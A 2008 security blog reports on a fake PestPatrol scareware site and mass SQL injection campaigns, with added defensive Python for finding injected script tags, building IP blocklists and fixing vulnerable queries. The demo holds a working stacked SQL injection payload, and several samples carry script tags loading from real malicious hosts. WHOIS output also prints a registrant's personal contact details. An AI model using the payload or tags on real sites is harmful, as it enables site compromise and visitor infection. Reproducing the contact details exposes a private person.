
Tuesday 27 May 2008

pest-patrol.com is not the real PestPatrol - part II

The fake pest-patrol.com site we mentioned a few days ago has fixed its download problem and has given us a sample. Like many of these fake anti-malware sites, the executable is changed continually to evade detection.

Detection rates are poor (VirusTotal results below: 3 of 32 engines flag it), and the real PestPatrol / eTrust product doesn't pick it up yet.

I strongly suspect that there's nothing good in the 85.255.112.0 - 85.255.127.255 range at all, and it is probably a good idea to block access to that entire IP block.

Antivirus;Version;Last Update;Result
AhnLab-V3;2008.5.22.1;2008.05.27;-
AntiVir;7.8.0.19;2008.05.27;SPR/Dldr.PestPatr.A
Authentium;5.1.0.4;2008.05.26;-
Avast;4.8.1195.0;2008.05.27;-
AVG;7.5.0.516;2008.05.26;-
BitDefender;7.2;2008.05.27;-
CAT-QuickHeal;9.50;2008.05.26;-
ClamAV;0.92.1;2008.05.27;-
DrWeb;4.44.0.09170;2008.05.27;-
eSafe;7.0.15.0;2008.05.26;-
eTrust-Vet;31.4.5826;2008.05.27;-
Ewido;4.0;2008.05.26;-
F-Prot;4.4.4.56;2008.05.26;-
F-Secure;6.70.13260.0;2008.05.27;-
Fortinet;3.14.0.0;2008.05.27;-
GData;2.0.7306.1023;2008.05.27;-
Ikarus;T3.1.1.26.0;2008.05.27;-
Kaspersky;7.0.0.125;2008.05.27;not-a-virus:Downloader.Win32.FraudLoad.bz
McAfee;5303;2008.05.26;-
Microsoft;1.3520;2008.05.27;-
NOD32v2;3134;2008.05.27;-
Norman;5.80.02;2008.05.26;-
Panda;9.0.0.4;2008.05.27;-
Prevx1;V2;2008.05.27;-
Rising;20.46.12.00;2008.05.27;-
Sophos;4.29.0;2008.05.27;-
Sunbelt;3.0.1123.1;2008.05.17;-
Symantec;10;2008.05.27;-
TheHacker;6.2.92.320;2008.05.26;-
VBA32;3.12.6.6;2008.05.27;-
VirusBuster;4.3.26:9;2008.05.26;-
Webwasher-Gateway;6.6.2;2008.05.27;Riskware.Dldr.PestPatr.A

chliyi.com - another injection attack

Thanks to Dancho Danchev for the heads up: it looks like there's another SQL injection attack on the loose, this time injecting a script tag pointing to chliyi.com/reg.js, with Google currently showing about 10,000 hits for it across a variety of sites.

Reportedly, the script launches an ActiveX exploit via obfuscated VBScript. This is another good reason not to use Internet Explorer: most other browsers do not support ActiveX, so they are not affected by this particular attack.

Unlike some other recent injection attacks, this one seems to use an established domain, chliyi.com, that has presumably been compromised rather than registered for the purpose. Unfortunately for the bad guys, the registration on the domain is going to run out pretty soon.

Domain Name.......... chliyi.com
Creation Date........ 2003-06-12 11:21:39
Registration Date.... 2003-06-12 11:21:39
Expiry Date.......... 2008-06-12 11:21:39
Organisation Name.... junrong shen
Organisation Address. dongxiaoqiao3-1-104
Organisation Address.
Organisation Address. suzhou
Organisation Address. 215006
Organisation Address. JS
Organisation Address. CN

Admin Name........... shen junrong
Admin Address........ dongxiaoqiao3-1-104
Admin Address........
Admin Address........ suzhou
Admin Address........ 215006
Admin Address........ JS
Admin Address........ CN
Admin Email.......... wzh@hisuzhou.com
Admin Phone.......... +86.51265678898
Admin Fax............ +86.51257306265

Tech Name............ zhihui wang
Tech Address......... suzhou
Tech Address.........
Tech Address......... suzhou
Tech Address......... 215021
Tech Address......... JS
Tech Address......... CN
Tech Email........... wzh@hisuzhou.com
Tech Phone........... +86.5169697639
Tech Fax............. +86.5167621807

Bill Name............ zhihui wang
Bill Address......... suzhou
Bill Address.........
Bill Address......... suzhou
Bill Address......... 215021
Bill Address......... JS
Bill Address......... CN
Bill Email........... wzh@hisuzhou.com
Bill Phone........... +86.5169697639
Bill Fax............. +86.5167621807
Name Server.......... dns22.hichina.com
Name Server.......... dns21.hichina.com

The server's IP address is 218.30.96.87, which is not in the Spamhaus DROP list. That again suggests that chliyi.com might well be a legitimate site that has simply been compromised.

This is another attack that goes to show that "there is no such thing as a safe site". A scan of the Google results comes up with some interesting (and alarming) infected sites:

  • forces.ca - Canadian military
  • paramountcomedy.com - Paramount Comedy (Cable TV channel)
  • kcsg.com - KCSG (Utah TV station)
  • umnh.utah.edu - University of Utah
  • digital.lib.ecu.edu - East Carolina University
  • chapel.duke.edu - Duke University
  • drdrew.com - Dr Drew (relationship advice)
  • gisp.org - Global Invasive Species Program
  • sciencescotland.org - Science Scotland (Royal Society of Edinburgh)
  • moffitt.org - H. Lee Moffitt Cancer Center and Research Institute
  • confetti.co.uk - Confetti (Wedding planning)
  • buildabear.com - Build-a-Bear Workshop
  • delluniversity.com - Dell
  • trelleborg.com - Trelleborg AB (Polymer manufacturer)
None of these are huge sites when it comes to traffic, but there are some well-known names there, and certainly some which you would hope would be more secure. Looking at the other infected sites, the US, Canada, Australia, the UK and Ireland have the biggest clusters, with very few showing up outside those countries.

This is not a comprehensive list of infected sites, and many of these sites will have been cleaned up.

If you are running a database-backed site, the rule is to secure your inputs: validate what comes in from the query string and form fields and pass it to the database as bound parameters rather than gluing it into the SQL. Otherwise you will get attacked again and again.
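A worked check for site owners, added here as an example and not part of the original post. The injected payload in these attacks appends a `<script src=...></script>` tag to every text value it can reach, so cleanup starts with finding every such tag in the database. The script below walks every text-typed column of a SQLite database (the same loop can be written against MS SQL's sysobjects/syscolumns), reports each tag with the host it loads from, flags the hosts named on this page, and then strips the tags. The database contents, table names and column names are constructed for the example; `example.org` is a reserved documentation domain used to show that hosts not on the list are still reported.

```python
import re
import sqlite3

# Hosts this page names as serving injected scripts. Every <script src=...> tag
# found in stored data is reported; these hosts are additionally flagged as known.
KNOWN_INJECTION_HOSTS = {
    "chliyi.com", "winzipices.cn", "bbs.jueduizuan.com",
    "free.hostpinoy.info", "xprmn4u.info",
}

# An external script tag; group 1 is the host it loads from.
SCRIPT_TAG = re.compile(
    r"<script[^>]*\ssrc\s*=\s*['\"]?\s*(?:https?:)?//([^/'\"\s>]+)[^>]*>\s*</script>",
    re.IGNORECASE,
)


def text_columns(conn):
    """Return [(table, column)] for every text-typed column of every user table."""
    cur = conn.cursor()
    tables = [r[0] for r in cur.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' "
        "AND name NOT LIKE 'sqlite\\_%' ESCAPE '\\'").fetchall()]
    cols = []
    for table in tables:
        # PRAGMA table_info rows: (cid, name, type, notnull, default, pk)
        for _cid, name, ctype, *_rest in cur.execute(f'PRAGMA table_info("{table}")').fetchall():
            if any(k in ctype.upper() for k in ("CHAR", "TEXT", "CLOB")):
                cols.append((table, name))
    return cols


def _suspect_rows(cur, table, col):
    # Cheap pre-filter in SQL; the regex does the real matching in Python.
    return cur.execute(
        f'SELECT rowid, "{col}" FROM "{table}" WHERE "{col}" LIKE \'%<script%\''
    ).fetchall()


def scan_for_injected_scripts(conn):
    """Return [(table, column, rowid, host, known)] for each script tag in stored text."""
    hits = []
    cur = conn.cursor()
    for table, col in text_columns(conn):
        for rowid, value in _suspect_rows(cur, table, col):
            for m in SCRIPT_TAG.finditer(value):
                host = m.group(1).lower()
                hits.append((table, col, rowid, host, host in KNOWN_INJECTION_HOSTS))
    return hits


def strip_injected_scripts(conn):
    """Delete every matched script tag from stored text; returns the number of values rewritten."""
    cur = conn.cursor()
    rewritten = 0
    for table, col in text_columns(conn):
        for rowid, value in _suspect_rows(cur, table, col):
            cleaned, n = SCRIPT_TAG.subn("", value)
            if n:
                cur.execute(f'UPDATE "{table}" SET "{col}" = ? WHERE rowid = ?', (cleaned, rowid))
                rewritten += 1
    conn.commit()
    return rewritten


def build_sample_db():
    """Constructed in-memory database imitating a site after the mass injection:
    the tag has been appended to text values, a title column included."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pages (title VARCHAR(100), body TEXT);
        CREATE TABLE comments (author VARCHAR(50), text TEXT, posted INTEGER);
    """)
    conn.executemany("INSERT INTO pages VALUES (?, ?)", [
        ("About us", "Welcome to our site."),
        ("News<script src=http://chliyi.com/reg.js></script>",
         "Latest news.<script src=http://chliyi.com/reg.js></script>"),
    ])
    conn.executemany("INSERT INTO comments VALUES (?, ?, ?)", [
        ("bob", "Nice post.<script src=http://winzipices.cn/1.js></script>", 1210000000),
        # a host not on the page's list, to show unknown hosts are still reported
        ("eve", 'See <script src="//example.org/x.js"></script>', 1210000001),
    ])
    conn.commit()
    return conn


if __name__ == "__main__":
    db = build_sample_db()
    for table, col, rowid, host, known in scan_for_injected_scripts(db):
        print(f"{table}.{col} rowid={rowid}: {host}{' (known)' if known else ''}")
    print("values rewritten:", strip_injected_scripts(db))
    print("remaining:", scan_for_injected_scripts(db))
```

Run the scan before the strip and keep its output: the list of hosts tells you which campaign hit you, and the per-row list is what you need to verify the cleanup and to watch for reinfection, which is the normal outcome if the injection point in the application has not been fixed.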

Wednesday 21 May 2008

pest-patrol.com is not the real PestPatrol

Thanks to Dancho Danchev for pointing out pest-patrol.com, yet another dodgy looking scareware site. The real PestPatrol is a well-known and legitimate anti-spyware product from CA; the one with the hyphen in the middle is definitely trying to pass itself off as the real thing.

The fake pest-patrol.com is hosted on 85.255.121.181 in Ukraine, in a range of network addresses that features on the Spamhaus DROP list, and it is registered through Estdomains, which always seems to be a popular choice with dodgy web sites.

The bottom of the page has a copyright notice claiming that it was created by "Pest Patrol, Inc.", but that is likely to be fake. A large amount of text has been copied and pasted directly from the real CA site. The "PestPatrol" name is pretty widely registered as a trademark, so apart from anything else, this fake pest-patrol.com site is clearly violating CA's trademark rights.

What's interesting about this is just how the pest-patrol.com domain ended up in the hands of a bunch of guys in Eastern Europe. Although the "PestPatrol" name is trademarked, that only applies to computer software. As it turns out, the original pest-patrol.com controlled pests of the creepy crawly variety. CA (or SaferSite Inc as it was before CA took over) would have had no claim over the domain name, as it wasn't violating any trademark or causing confusion. But eventually the name expired, and after being dropped a couple of times it ended up with someone who clearly is using it to violate a trademark.

The lesson for businesses is perhaps that they need to keep an eye on domains that could potentially violate a trademark or be confusing, and secure them if they expire; several registrars offer backorders on expiring domain names. In the long run, that's probably easier than trying to track down an anonymous registrant from the former Soviet Union.

The download option on pest-patrol.com doesn't work at present, but it could be similar to this one (VirusTotal scan results), which appears on a sister site. Unfortunately, CA's genuine product doesn't seem to detect it.

Sunday 11 May 2008

Mass phpBB attack free.hostpinoy.info and xprmn4u.info

Another injection attack reported by the ISC, and this time it appears to be using one of many potential flaws in phpBB. The injected code points to free.hostpinoy.info/f.js and xprmn4u.info/f.js, and a Google search for these two terms currently comes up with 858,000 matches between them, indicating that this is a very large scale attack.

phpBB is a great bit of software, but sadly it is riddled with security holes and requires constant updating. If you're running a phpBB forum then you need to patch it as a matter of urgency. If you don't run phpBB and are looking at running a forum then I've got to say.. try something else.

It looks like some version of the Zlob trojan is being served up; see here and here for more details. (Thanks sowhatx). Detection rates seem to be patchy. It's possible that the injected code is using some sort of geotargeting, as the destination sites are not consistent.

free.hostpinoy.info is 209.51.196.254 (XLHost.com)
xprmn4u.info is 217.199.217.9 (Mastak.ru)

Updated: A brief analysis of some of the impacted sites shows a mix of high traffic forums and long-dead ones. Some of these forums are hit with multiple exploits and massive amounts of spam, which indicates that they are running a very out of date version of phpBB.. so folks, if you have a forum which you don't use any more, do everyone a favour and delete it.

Wednesday 7 May 2008

winzipices.cn and bbs.jueduizuan.com - another SQL injection attack

The ISC has warned about another SQL Injection attack, following on from this one a few weeks ago. This time the injection is inserting a script pointing to the winzipices.cn and bbs.jueduizuan.com domains.

The malicious script is pointing to winzipices.cn/1.js, winzipices.cn/2.js, winzipices.cn/3.js, winzipices.cn/4.js and winzipices.cn/5.js and also bbs.jueduizuan.com/ip.js. As ever, don't visit these sites unless you know what you are doing.

Right at the moment, winzipices.cn is coming up with a server error, but bbs.jueduizuan.com is functioning just fine. Its script tries to attack visiting systems using the MS07-004 vulnerability and a RealPlayer vulnerability, and it also attempts to download an executable from www.bluell.cn/ri.exe, possibly using a shell vulnerability (VirusTotal analysis here, mostly detected as Trojan.Win32.Agent.lpv, Trojan.MulDrop.origin or TR/Dropper.Gen).

Some IP addresses:
www.bluell.cn is 60.191.239.219
winzipices.cn is 60.191.239.229
bbs.jueduizuan.com is 60.191.239.219

My recommendation is to block access to the entire 60.191.239.x range if you can.
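To turn the range recommended here, and the 85.255.112.0 - 85.255.127.255 range from the pest-patrol.com post above, into something a firewall or proxy can use, here is an added example that is not part of the original post. It collapses the start/end ranges into CIDR blocks, emits iptables DROP rules for them, and then checks squid-format proxy log lines for requests that reached the blocked ranges, which is how you find the clients that need looking at. The log lines, client addresses and timings are constructed; the rule format assumes a Linux gateway running iptables.

```python
import ipaddress
import re

# Ranges this page recommends blocking, as start/end pairs (constructed config list).
BLOCK_RANGES = [
    ("85.255.112.0", "85.255.127.255"),   # pest-patrol.com and its sister sites
    ("60.191.239.0", "60.191.239.255"),   # winzipices.cn, bbs.jueduizuan.com, www.bluell.cn
]


def to_cidrs(ranges):
    """Collapse start/end pairs into the smallest list of CIDR networks."""
    nets = []
    for start, end in ranges:
        nets.extend(ipaddress.summarize_address_range(
            ipaddress.ip_address(start), ipaddress.ip_address(end)))
    return list(ipaddress.collapse_addresses(nets))


def is_blocked(ip, nets):
    """True if ip falls inside any of the networks."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in nets)


def iptables_rules(nets, chain="FORWARD"):
    """One DROP rule per network, for a gateway (use OUTPUT on the proxy host itself)."""
    return [f"iptables -A {chain} -d {net} -j DROP" for net in nets]


# Constructed squid native-format access log lines; clients and timings are made up.
# Fields: time elapsed client action/code bytes method URL user hierarchy/peer type
SAMPLE_LOG = """\
1211880000.123    250 192.168.1.10 TCP_MISS/200 5120 GET http://www.example.com/ - DIRECT/203.0.113.5 text/html
1211880001.456    310 192.168.1.22 TCP_MISS/200 14320 GET http://pest-patrol.com/ - DIRECT/85.255.121.181 text/html
1211880002.789    120 192.168.1.10 TCP_MISS/200 2048 GET http://bbs.jueduizuan.com/ip.js - DIRECT/60.191.239.219 application/x-javascript
1211880003.012     90 192.168.1.31 TCP_MISS/200 960 GET http://chliyi.com/reg.js - DIRECT/218.30.96.87 application/x-javascript
"""

LOG_RE = re.compile(
    r"^\S+\s+\d+\s+(?P<client>\S+)\s+\S+\s+\d+\s+\S+\s+(?P<url>\S+)\s+\S+\s+\S+/(?P<peer>\d+(?:\.\d+){3})"
)


def hits_in_log(log_text, nets):
    """Return [(client, url, peer_ip)] for requests that went to a blocked range."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_blocked(m.group("peer"), nets):
            hits.append((m.group("client"), m.group("url"), m.group("peer")))
    return hits


if __name__ == "__main__":
    nets = to_cidrs(BLOCK_RANGES)
    print("\n".join(iptables_rules(nets)))
    for client, url, peer in hits_in_log(SAMPLE_LOG, nets):
        print(f"{client} fetched {url} from blocked host {peer}")
```

Note that the chliyi.com request in the sample is not flagged: its server, 218.30.96.87, is not in either range, which is the point made above about that site being a compromised host rather than attacker infrastructure. An IP blocklist catches the attacker-controlled ranges; the compromised site needs a separate domain or URL block.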

At the moment, a Google search for winzipices.cn shows 1790 matches, and for jueduizuan.com 1640 matches. Expect those figures to climb sharply.

If you are running an impacted SQL server, then you need to fix the application in front of it: validate input and use parameterised queries, else the problem will happen again. Client machines should be protected if they are fully up-to-date on patches; if you have been infected then use the excellent Secunia Software Inspector to check your system for vulnerable apps.
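An added illustration of the advice here and in the chliyi.com post above; it is not code from the original post or from any affected site. It shows a lookup-by-id handler that glues the query string value into SQL, the stacked payload that turns a harmless SELECT into an UPDATE of every row, and the fixed handler that checks the type and binds the value. SQLite is used so it runs offline: `run_batch` emulates a driver that executes a whole statement batch the way ADO against SQL Server did on the affected ASP sites, and `||` stands in for SQL Server's `+`. The table, column and product names are constructed, and the payload is a plain-text stand-in for the hex-encoded batch the real attacks used.

```python
import sqlite3

INJECTED_TAG = "<script src=http://winzipices.cn/1.js></script>"

# Attacker-supplied value for the "id" query parameter. In the real attacks the
# batch was hex-encoded, CAST to a string and EXEC'd, and it looped over every
# text column in the database; this constructed payload hits one table in plain
# text. (|| is SQLite's string concatenation; SQL Server uses +.)
PAYLOAD = (
    "1; UPDATE products SET name = name || '" + INJECTED_TAG + "', "
    "blurb = blurb || '" + INJECTED_TAG + "'"
)


def setup():
    """Constructed catalogue table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name VARCHAR(100), blurb TEXT);
        INSERT INTO products VALUES (1, 'Widget', 'A fine widget.');
        INSERT INTO products VALUES (2, 'Gadget', 'A finer gadget.');
    """)
    return conn


def run_batch(conn, sql):
    """Emulates a driver that accepts a statement batch, as ADO against SQL Server
    did: every ';'-separated statement runs, and the first one's rows come back.
    (sqlite3's execute() refuses multi-statement strings, hence the emulation.)"""
    cur = conn.cursor()
    statements = [s for s in sql.split(";") if s.strip()]
    rows = cur.execute(statements[0]).fetchall()
    for extra in statements[1:]:
        cur.execute(extra)
    conn.commit()
    return rows


def product_vulnerable(conn, product_id):
    """The vulnerable pattern: the query-string value is concatenated into the SQL."""
    return run_batch(conn, "SELECT name, blurb FROM products WHERE id = " + product_id)


def product_safe(conn, product_id):
    """The fix: reject anything that is not an integer, then bind the value as a
    parameter so that it can only ever be data, never SQL."""
    try:
        pid = int(product_id)
    except ValueError:
        raise ValueError("product id must be an integer") from None
    return conn.execute("SELECT name, blurb FROM products WHERE id = ?", (pid,)).fetchall()


def count_injected(conn):
    """How many rows now carry the injected tag."""
    return conn.execute(
        "SELECT COUNT(*) FROM products WHERE name LIKE '%<script%' OR blurb LIKE '%<script%'"
    ).fetchone()[0]


if __name__ == "__main__":
    db = setup()
    print(product_vulnerable(db, "1"))          # a normal request works...
    product_vulnerable(db, PAYLOAD)             # ...and so does the attack
    print("rows injected (vulnerable):", count_injected(db))

    db = setup()
    print(product_safe(db, "1"))
    try:
        product_safe(db, PAYLOAD)
    except ValueError as e:
        print("rejected:", e)
    print("rows injected (safe):", count_injected(db))
```

Binding alone would already defeat this payload, because the driver sends it as a string value that matches no integer id, but the explicit type check is what keeps the error message clean and stops the value ever reaching the database. Escaping quotes is not a fix here: the payload contains a quote only inside the string it appends, and the injection point itself is a number with no quotes around it.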

As always, there are some high profile sites that have been compromised. They may well have been cleaned up by now, so inclusion here says nothing about whether they are currently safe to visit.

bbs.jueduizuan.com
  • safecanada.ca (Canadian Homeland Security again).
  • breastcanceradvice.com, arthritisissues.com, menssexhealth.com, www.bipolardepressioninfo.com (Health)
  • dubaicityguide.com (Travel)
  • classicdriver.com (Motoring)
winzipices.cn
  • imo.org (International Maritime Organisation)
  • cifas.org.uk (Fraud Prevention)
  • hmdb.org (Historical Marker Database)
  • abbyy.com (OCR software)
  • cancerissues.com, adhdissues.com, depressionissues.com, diabeticdiets.org, erectilefacts.com, prostatecancerissues.com, digestivefacts.com (Health)
  • www.asiamedia.ucla.edu, www.international.ucla.edu, www.asiaarts.ucla.edu, www.isop.ucla.edu (UCLA)
  • newmarket.travel (Travel)
  • discoverireland.ie (Travel)
  • gay.tv (Lifestyle)
Some of these sites are regularly infected with SQL injection attacks, and safecanada.ca was infected with the last major outbreak. The problem is that once a site has been attacked and enumerated, then it will be attacked again and again until it is fixed.

As mentioned before, there is no such thing as a safe site.